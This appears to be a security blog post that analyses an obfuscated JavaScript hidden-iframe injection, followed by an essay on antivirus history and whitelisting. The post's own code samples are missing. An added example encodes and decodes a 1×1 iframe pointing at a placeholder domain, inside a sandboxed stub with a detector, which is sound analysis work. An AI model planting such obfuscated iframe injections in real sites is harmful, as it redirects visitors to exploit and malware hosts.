Analysis of an Obfuscated iFrame
Introduction
Obfuscated attacks against iFrames are wildly out of control in the IT world today. Legitimate enterprise websites and personal websites alike are unknowingly hosting these attacks. The attacks simply redirect users to a third-party website hosting an exploit and, more often than not, pieces of malware. I have been given unconfirmed reports that malware writers earn $1.50 for every system they deliver this malware to, which means that people are more than willing to deliver the attacks. In this research report we will look at a piece of obfuscated JavaScript in order to understand how attackers are hiding their activities on legitimate websites.
Below is a real iframe attack found on an exploited website.

Simple Analysis
It is rare that the attack will be found in such readable form. In fact it is usually all put onto a single line; I simply broke it out into a more readable format. In some cases it is easy to find this code because it is by far the longest line in the page. Regardless, below is the simple flow of how this code works.
1. Initialize variables k1, k2, t1, t2, and h.
2. Deobfuscate k1 and k2.
3. Write h to the user.
Resulting deobfuscated code (note that the frame is set to be virtually invisible at 1×1 pixel):

In-depth Analysis
Variable Initialization
Let's take a look at what's happening here. First we have two hideous and large JavaScript string variables called "k1" and "k2". These variables contain obfuscated strings (I know, tough to believe). Next we have two integer variables, t1 and t2. Both are initialized to zero; these dumb variables are meant to fuel the while loops later on in the code. Finally we have a string variable "h" which is initialized to NULL. h is basically the end variable that combines "behgczzazbzc" with the decoded k1 and k2 variables; this provides the actual attack.
While Loops
The while loops are relatively unimportant, as they are merely deobfuscating the k1 and k2 variables and adding the deobfuscated information to the h string. In order to do this the attacker is using two predefined functions: the String.fromCharCode() function and the charCodeAt() method of the k1 string.
String.fromCharCode() is a function that returns the characters that correspond to the ISO-Latin-1 numerical positions passed to the function. E.g. String.fromCharCode(65) = A
A reference sheet for ISO-Latin-1 characters and their numeric position can be viewed here.
In order to get the proper position to insert into String.fromCharCode(), the attack code first converts the current ISO-Latin-1 character into its corresponding position. This is done by using the string's charCodeAt() method. The while loops add a small amount of complication to this action by shifting the ISO-Latin-1 character position by -3 and -2.
Adding To the String
In the attack code (between the while loops), there is a simple addition to the string that adds the domain to the actual attack. There is no way to tell that this is the domain until after the code is deobfuscated. The reason this is segmented in the code is that the attacker can quickly change the domain of the attack while preserving the rest of the attack code.
Putting it All Together
The attack code finishes up by writing the document to the victim with the document.write() function. This is important to recognize because by the time the variable h reaches this function, it is deobfuscated. Therefore, an analyst can simply change this function to be non-malicious in order to see what is actually obfuscated in the code. For example, instead of document.write() one could use window.alert().
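To make that analyst's trick concrete, here is an added example (not code from the original post) that replays the two decoding loops on a constructed sample and swaps document.write() for a recording stub, then flags the 1×1 frame. The shifted strings and the example.invalid domain are constructed here and are not taken from the real attack.

```javascript
// Same loop shape the obfuscated script uses: walk the string and emit the
// character whose ISO-Latin-1 code is the current code minus a fixed shift.
function decodeShifted(s, shift) {
  let out = "";
  let t = 0;
  while (t < s.length) {
    out += String.fromCharCode(s.charCodeAt(t) - shift);
    t++;
  }
  return out;
}

function encodeShifted(s, shift) { // inverse of the loop; builds the sample only
  return Array.from(s, (c) => String.fromCharCode(c.charCodeAt(0) + shift)).join("");
}

// Constructed sample in the layout the post describes: k1 shifted by +3, k2 by +2,
// and a placeholder domain (not a real attack domain) added in the clear between
// the loops. JSON.stringify keeps the shifted text a valid JS string literal.
const SAMPLE_DOMAIN = "example.invalid";
const SAMPLE_SCRIPT =
  `var k1=${JSON.stringify(encodeShifted('<iframe src="http://', 3))},` +
  `k2=${JSON.stringify(encodeShifted('/" width=1 height=1></iframe>', 2))},` +
  `t1=0,t2=0,h="";` +
  `while(t1<k1.length){h+=String.fromCharCode(k1.charCodeAt(t1)-3);t1++;}` +
  `h+=${JSON.stringify(SAMPLE_DOMAIN)};` +
  `while(t2<k2.length){h+=String.fromCharCode(k2.charCodeAt(t2)-2);t2++;}` +
  `document.write(h);`;

// The analyst trick from the post: run the script against a stand-in document
// whose write() records the HTML instead of rendering it.
function captureDocumentWrite(script) {
  const written = [];
  const fakeDocument = { write: (html) => { written.push(String(html)); } };
  new Function("document", script)(fakeDocument);
  return written.join("");
}

// Flag the "virtually invisible" frame: an <iframe> whose width and height are
// both 1 pixel or less.
function isHiddenIframe(html) {
  const tag = /<iframe\b[^>]*>/i.exec(html);
  if (!tag) return false;
  const px = (attr) => {
    const m = new RegExp(attr + "\\s*=\\s*['\"]?(\\d+)", "i").exec(tag[0]);
    return m ? Number(m[1]) : NaN;
  };
  return px("width") <= 1 && px("height") <= 1;
}
```

Running `captureDocumentWrite(SAMPLE_SCRIPT)` returns the assembled iframe tag without it ever touching a real DOM, and `isHiddenIframe` on that result reports true.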
Detecting/Defending Against These Attacks
Anti-virus/Anti-malware
Some anti-virus and anti-malware solutions flag and stop these attacks from affecting end-users. Unfortunately, however, research points to the fact that very few are actually capable of detecting these attacks. I rolled this attack up into an HTML file and submitted it to VirusTotal, where 41 anti-virus/anti-malware scanners assessed the file. Of those 41 scanners, only three detected there was an issue.
Browser Protection Software:
- Trusteer Browser Protection Software
- Kace Browser Protection Software
- HP/Symantec/Mozilla Browser Sandboxing Software
- Various Virtual Browser Sandboxing Solutions
Content Filtering Technology
Content filtering technology could help in two ways. First, it could detect the issue on the page to begin with and proactively categorize the page to prevent the victim from accessing the attack code. Second, if the attack code is delivered to the victim, the content filtering system could still prevent the victim from actually accessing the malicious website hosting the exploit and malware.
Example Content Filtering System Software:
- BlueCoat WebFilter
- WebSense WebFilter
- ScanSafe WebFilter/Malware Scanner
- Many, many others
IPS Technology
Intrusion Prevention Systems can be used to block the exploit from getting to the victim. Unfortunately, in many cases the actual prevention is based on the exploit and not the vulnerability. This means that the exploit can be altered to bypass the IPS fairly easily by altering the signature and/or behavior of the attack. Of course, finely tuned and sophisticated IPSs have fewer issues with this.
Example IPS:
- Sourcefire SNORT
- IBM Internet Security Systems Proventia
- McAfee Network Security Platform (formerly Intrushield IPS)
- TippingPoint Digital Vaccine
- Many, many others
When Did We Lose the Endpoint Security Fight?
First let me be specific when I mention "malware." When I'm talking about malware I am lumping together any type of malicious piece of software that can harm an end-user or system. This means viruses, worms, trojans, keyloggers, rootkits, backdoors, etc. With that out of the way, I have to say that recent experiences in dealing with both security professionals and IT professionals have left me wondering: when did we concede defeat to malware? I have found myself explaining on multiple occasions to end users that "viruses happen." Which is as if to say, "Sorry, nothing we can do about it, it's just a side effect of using a computer."
WHAT?!
When did we give up in the fight for protecting our networks from malware? Furthermore, why, with advancing technology, aren't we better addressing the issues relating to malware? The search for the answers to these questions has sent me down a virtual memory lane of the incidents and virus outbreaks that have truly shaped the modern-day IT security world. In the end, though, I found that the answer was simple: we conceded defeat when we became unwilling to move off of broken and backwards endpoint security models.
Consider the History
From Cloner to Conficker (1982-2009), security has always been a step behind malicious attacks. The introduction of malware to the world at large came in the form of somewhat damaging and annoying but simple pieces of software that we termed viruses. The simplicity of these pieces of software yielded a relatively simple solution that we termed antivirus software. These early ancestors of modern-day "Internet Security Suites" worked in a relatively simple fashion. Early antivirus would search files for a particular signature and, if that signature matched a known bad signature, the antivirus would mitigate the issue. Unfortunately, because the Internet was nowhere near as large or as useful as it is today, most antivirus signature engines were not updated regularly. This means that as infected floppy disks were being passed from machine to machine, most systems were left vulnerable to the new or avant-garde attacks of the day.
However, because the number of viruses in the wild was relatively small (by today's standards), antivirus companies were able to produce a reasonably high level of assurance that their software would protect their customers' systems. Furthermore, because antivirus software quite clearly did not enjoy the industry adoption that its modern-day relatives do, it made sense that the solutions were reactive in nature. Most organizations were looking to purchase antivirus software because they had experienced an incident or were experiencing an incident. Thus, it made sense that antivirus technology could be installed to alleviate a problem that already existed as opposed to trying to prevent a problem from arising. In fact, this model for solving known security issues worked so well for many organizations that antivirus software became a de facto security solution.
Then something interesting happened: computers became interconnected through various networking technologies and viruses became self-propagating over various mechanisms. Eventually we would call many of these self-propagating viruses worms because they were capable of traveling from computer to computer on their own (through wire tunnels). Early worms such as the "Morris Worm" wreaked havoc on networks all across the world. These worms exploited software vulnerabilities in ways that the IT community had never considered before. Instead of modernizing the endpoint antivirus solutions already adopted by many organizations, most sought network technologies to try and prevent worms from accessing propagation vectors. For example, many integrated firewalls and gateway appliances that often scanned e-mails for viruses. However, most of the antivirus technologies available went unchanged; they were still using the exact same signature-based scanning techniques in an attempt to address the changing threat landscape.
It was not until the massive flood of malware such as Code Red, Nimda, Klez, Blaster, Netsky, Sasser, Slammer and a myriad of others that we really started to see changes. More sophisticated antivirus solutions became anti-malware solutions or Internet Security Suites that integrated endpoint security technology such as host-based firewalls, host-based IPS, host-based spam filters, privacy protection, and even vulnerability management solutions. These technologies, however, were purposed to prevent malware from exploiting vulnerable vectors on an endpoint and wouldn't prevent malware that was legitimately delivered to the system or was delivered over a vulnerability that the other technologies were not as yet aware of. Therefore antivirus engine models also began to evolve to include technologies such as heuristic-based malware detection, behavior detection, file analysis, and file emulation.
However, even with these innovations, endpoint anti-malware alone does not offer a high level of security assurance. Thus, most organizations have also integrated multiple network technologies in an attempt to complement the capabilities of endpoint anti-malware. These include NAC, which prevents users who may be infected from accessing the network segments of supposedly malware-free machines; Intrusion Prevention Systems (IPS), which stop a multitude of network-based attacks from exploiting endpoints; firewalls, which also prevent a multitude of attacks; and Network Behavioral Analysis Detection Systems (NBADS), which detect covert channels used by malware.
While all of these technologies working together properly does offer a much higher level of security assurance, unfortunately there are still a great deal of malware-related issues. Malware has evolved to take advantage of the logical cracks between the separate security technologies used in these models.
How Does This Outline the Defeat?
The security community has been doomed to fail in the fight against malware from the very beginning. We built our models based on a last line of defense that is totally reactive. Anti-malware technology has made giant leaps in effectiveness with enhanced technologies such as heuristic or behavioral-based detection. Unfortunately, that technology will always be reactive to the constantly evolving threat environment. Furthermore, the security community has been doomed to fail because, instead of addressing that simple base issue, we have decided to attempt to tack on new technology. This has done little more than grow network complexity and blur the lines of what technology is really responsible for preventing malware-related issues. Of course, don't get me wrong: I am a MAJOR advocate of network-based security technology such as content filters, IPS, firewalls, NBADS, and others. There are a multitude of reasons why these technologies are necessary. However, the underlying issue of malware still remains; we are doomed to concede defeat until we relieve ourselves of the blacklist endpoint anti-malware strategy.
Is There Light at the End of the Tunnel?
Quite possibly. The continued proliferation and maturity of whitelist anti-malware models offers a great deal of hope. Whitelist anti-malware breaks the trend of endpoint security solutions predicated primarily on a reactive approach to security. Whitelist anti-malware simply focuses on what is allowed on a system as opposed to what is not. Of course, this could cause a great deal of management overhead for organizations that have dynamic environments. However, as whitelist anti-malware has continued to mature, most leaders in the space have made this a key focus area for the development that has gone into their products. And at this point, whitelist anti-malware technology is a HOT topic in the market.
Many leaders are now capable of assisting security focused organizations in making the transition from ineffective blacklist models towards more effective, easy to manage, whitelist models. In fact, whitelist technology already has one of the best penetration rates in organizations focused on building the best security model possible from the ground up. Organizations such as those conforming to NERC/CIP standards have been especially keen on adopting endpoint whitelist technology. Besides the benefits of compliance and security, there are also major benefits in configuration change and control for adopters.
The rapid adoption of this technology has interesting future implications, as the solidification of endpoints will allow organizations to focus on other areas outside of malware-related incident response and endpoint security. As a result, one would expect security postures to begin becoming more solid from the ground up. This could cause a far more sensible evolution in the methodology with which security models are built. Of course, at this point, one can only hope.

